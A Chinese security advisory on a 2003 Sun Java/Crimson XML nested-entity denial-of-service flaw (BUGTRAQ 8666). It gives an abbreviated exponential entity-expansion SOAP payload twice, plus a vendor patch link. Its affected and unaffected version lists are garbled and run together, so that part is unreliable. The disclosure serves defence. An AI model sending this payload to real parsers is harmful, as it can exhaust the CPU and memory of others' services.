安全研究
安全漏洞
Sun Java XML文档嵌套实体拒绝服务攻击漏洞
发布日期:2003-09-22
更新日期:2003-09-27
受影响系统:
Sun JRE (Linux Production Release) 1.4.1_03不受影响系统:
Sun JRE (Linux Production Release) 1.4.1_02
Sun JRE (Linux Production Release) 1.4.1_01
Sun JRE (Linux Production Release) 1.4.1
Sun JRE (Linux Production Release) 1.4.0_03
Sun JRE (Linux Production Release) 1.4.0_02
Sun JRE (Linux Production Release) 1.4
Sun JRE (Linux Production Release) 1.3.1_06
Sun JRE (Linux Production Release) 1.3.1_05
Sun JRE (Linux Production Release) 1.3.1_03
Sun JRE (Linux Production Release) 1.3.1_02
Sun JRE (Linux Production Release) 1.3.1_01
Sun JRE (Linux Production Release) 1.3.1
Sun JRE (Linux Production Release) 1.3.0_05
Sun JRE (Linux Production Release) 1.3.0_02
Sun JRE (Linux Production Release) 1.3.0
Sun JRE (Linux Production Release) 1.2.2_011
Sun JRE (Linux Production Release) 1.2.2_010
Sun JRE (Linux Production Release) 1.2.2_007
Sun JRE (Linux Production Release) 1.2.2_003
Sun JRE (Linux Production Release) 1.2.2
Sun JRE (Solaris Production Release) 1.4.1_03
Sun JRE (Solaris Production Release) 1.4.1_02
Sun JRE (Solaris Production Release) 1.4.1_01
Sun JRE (Solaris Production Release) 1.4.1
Sun JRE (Solaris Production Release) 1.4.0_03
Sun JRE (Solaris Production Release) 1.4
Sun JRE (Solaris Production Release) 1.3_05
Sun JRE (Solaris Production Release) 1.3.1_06
Sun JRE (Solaris Production Release) 1.3.1_05
Sun JRE (Solaris Production Release) 1.3.1_03
Sun JRE (Solaris Production Release) 1.3.1_02
Sun JRE (Solaris Production Release) 1.3.1_01
Sun JRE (Solaris Production Release) 1.3.0_02
Sun JRE (Solaris Production Release) 1.3
Sun JRE (Solaris Production Release) 1.2.2_11
Sun JRE (Solaris Production Release) 1.2.2_10
Sun JRE (Solaris Production Release) 1.2.2_07
Sun JRE (Solaris Production Release) 1.2.2_05a
Sun JRE (Solaris Production Release) 1.2.1
Sun JRE (Solaris Production Release) 1.2
Sun JRE (Solaris Production Release) 1.1.8_15
Sun JRE (Solaris Production Release) 1.1.8_14
Sun JRE (Solaris Production Release) 1.1.8_13
Sun JRE (Solaris Production Release) 1.1.8_10
Sun JRE (Solaris Production Release) 1.1.7B
Sun JRE (Windows Production Release) 1.4.1_03
Sun JRE (Windows Production Release) 1.4.1_02
Sun JRE (Windows Production Release) 1.4.1_01
Sun JRE (Windows Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.4.0_03
Sun JRE (Windows Production Release) 1.4
Sun JRE (Windows Production Release) 1.3_05
Sun JRE (Windows Production Release) 1.3.1_06
Sun JRE (Windows Production Release) 1.3.1_05
Sun JRE (Windows Production Release) 1.3.1_03
Sun JRE (Windows Production Release) 1.3.1_02
Sun JRE (Windows Production Release) 1.3.1_01a
Sun JRE (Windows Production Release) 1.3.0_02
Sun JRE (Windows Production Release) 1.3
Sun JRE (Windows Production Release) 1.2.2_011
Sun JRE (Windows Production Release) 1.2.2_010
Sun JRE (Windows Production Release) 1.2.2_007
Sun JRE (Windows Production Release) 1.2.1
Sun JRE (Windows Production Release) 1.2
Sun JRE (Windows Production Release) 1.1.8_009
Sun JRE (Windows Production Release) 1.1.8_008
Sun JRE (Windows Production Release) 1.1.8_007
Apache Software Foundation Crimson 1.0
Sun JRE (Linux Production Release) 1.2.2_005
- Debian Linux 2.2
- Mandrake Linux 7.2
- RedHat Linux 7.0
- SuSE Linux 7.0
Sun JRE (Solaris Production Release) 1.1.6
- Sun Solaris 8.0
- Sun Solaris 7.0
- Sun Solaris 2.6
Sun JRE (Linux Production Release) 1.4.2描述:
Sun JRE (Solaris Production Release) 1.4.2
Sun JRE (Windows Production Release) 1.4.2
Apache Software Foundation Crimson 1.1
BUGTRAQ ID: 8666
Sun Java 2 SDK是一款Java实现平台。
Sun Java当处理特殊构建的XML文档时存在问题,远程攻击者利用这个漏洞诱使用户访问恶意XML文档而使系统崩溃。
当XML不允许递归实体定义,而允许嵌套实体定义时,如果XML数据来自外部资源,就有可能产生拒绝服务攻击,如类似如下的SOAP文档包含深层嵌套实体定义,可导致消耗100%CPU时间和消耗大量内存:
<?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY x99 "&x100;&x100;"> <!ENTITY x98 "&x99;&x99;"> ... <!ENTITY x2 "&x3;&x3;"> <!ENTITY x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope>
<*来源:Sun Release Notes
链接:http://java.sun.com/j2se/1.4.2/relnotes.html#JAXP_security
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY x99 "&x100;&x100;"> <!ENTITY x98 "&x99;&x99;"> ... <!ENTITY x2 "&x3;&x3;"> <!ENTITY x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope>
建议:
厂商补丁:
Sun
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载使用Java 2 SDK, Standard Edition:
http://java.sun.com/j2se/1.4.2/relnotes.html
浏览次数:3256
严重程度:0(网友投票)
绿盟科技给您安全的保障